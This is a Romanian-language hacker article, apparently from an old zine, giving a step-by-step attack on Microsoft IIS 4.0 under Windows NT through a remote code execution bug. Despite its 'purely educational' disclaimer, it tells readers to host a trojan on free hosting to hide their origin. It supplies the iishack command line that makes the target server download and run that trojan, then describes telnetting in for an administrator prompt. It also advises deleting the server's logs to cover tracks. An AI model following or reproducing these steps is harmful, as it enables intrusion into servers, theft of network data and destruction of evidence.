|
Aceasta este prima
parte dintr-o serie de articole despre BUG-urile Windows-ului NT , si
are scop PUR EDUCATIONAL , prin aceasta nu-mi asum responsabilitatea utilizarii
cu alte scopuri decit cele educationale.Cam atit cu partea introductiva
, de trebuie si ea pusa pe aici.
Sa trecem la lucruri serioase; de ce se cheama WEB Atack ? , simplu ,
pentru ca atacul este indrepta asupra serverului de internet al Windows-ului
NT , si mai precis , se da direct pe Portul 80 , ceea ce face ineficienta
o protectie cu FireWall .
Sa vedem acum ce face
? Pai nimic grav , Doar oricine poate obtine prompt DOS in server cu drepturi
de ADMINISTRATOR , adica poti face ce vrei cu bietul server , de la sterfisiere
, schimbat parole , pina copiat informatii din intreaga retea , nu numai
de pe server , asadar o nimica toata. Pentru a explica cum functioneaza
, este necesara explicarea , sau mai precis , prezentarea citorva din
facilitatiile IIS 4.0 :
HTR - HTML Remote Administration Permite administrare de la distanta .
IDC - Internet DATABASE Connector Permite unei aplicatii de internet sa
acceseze HDD , in mod direct prntru cautare de date .
STM - Server Files
Cind se face o cere catre un server ( adresa de internet ) - http://www.tinta.com
- , serverul de internet , IIS 4.0 , raspunde prin trimiterea cererii
catre niste programele ( htr.dll , idc.dll , stm.dll ) , care analizeaza
cererea , si hoatarasc ce sa faca . In acest lant , a aparut o scapare
, si se poate ca in anumite situatii , in urma unei cereri , sa se faca
un DOWNLOAD urmat de o EXECUTIE pe server a unui TROJAN .
Problema cu toate ca este foarte periculoasa , in loc sa fie analizata
serios , a facut , ca acest lucru - Download-ul si EXECUTAREA pe SERVER
/ WORKSTATION ( prin workstation ma refer la ori ce calculator care are
un sistem de operare pe el ) a programelor sa ia amploare prin utilizarea
tehnologiei JAVA , care este baza pe acest lucru . Acesta va fi un alt
subiect de articol intru-un nr. viitor.
Sa reluam discutia ; zice-am ca IIS 4.0 va rula programul pe care i l-am
indicat , in cazul nostru un trojan , in urma exectarii acestuia , se
va trimite pe portul 80 sau 99 prompt DOS cu drept de ADMINISTRATOR.
Cum se ataca un server , folosind acest BUG ?
Mai intii se pune la o adresa de internet trojanul - se zicem ca exemplu
la geocities sau tripod sau in oricare alta parte unde se asigura free
web hosting ( asta ca sa nu se prinda de unde s-a dat atacul ) , pentru
cazul nostru asdresa unde se afla trojanul este : http://www.freeservers.com/MySite/ncx.exe
sau
http://www.freeservers.com/MySite/ncx99.exe , unde atit ncx.exe ( pentru
portul 80 ) , cit si ncx99.exe ( pentru portul 99 ) sunt trojenii care
vor fi download-ati si executati de serverul tinta .Programele trebuie
sa se afla - in cazul exemplului - in root-ul site-ului , adica unde se
afla pagina Defaul.htm sau index.html , mai precis unde se afla intreg
site-ul.
Acum este foarte simplu ce aveti de facut , doar butonati urmatarea linie
de comanda :
iishack www.tinta.com 80 www.freeservers.com/MySite/ncx.exe
Parametrii de lasare a programului IISHACK :
SINTAXA: iishack <host> <port> <url>
ex - iishack www.tinta.com 80 www.myserver.com/thetrojan.exe
Dupa trimiterea atacului , IIS 4.0 de pe tinta , nu va mai raspunde la
comenzii , iar trojan-ul se va download-a si se va executa , apoi , daca
totul a fost OK , se poate face telnet pe www.tinta.com pe portul 80 sau
99 ( functie de trojan-ul folosit ) si va aparea un prompt de DOS . Trebuie
avut grija , ca sunt necesare cateva secunde pina se face download-ul
, iar telnet-ul trebuie dat in max 30 sec. , dupa aceea trebuie restartat
serverul tinta .
Dupa intrare trebuie sterse logurile : c:\winnt\system32\logs , si sterge-ti
tot ce se poate , pentru a nu lasa urme.
ATENTIE !!!! Nu poate fi rulat decat o singura data , IIS , blocandu-se
, aceasta necesitand o reinitializare a sistemului .
Good luck !
Cod sursa: IISHACK.ASM
|
|
|
|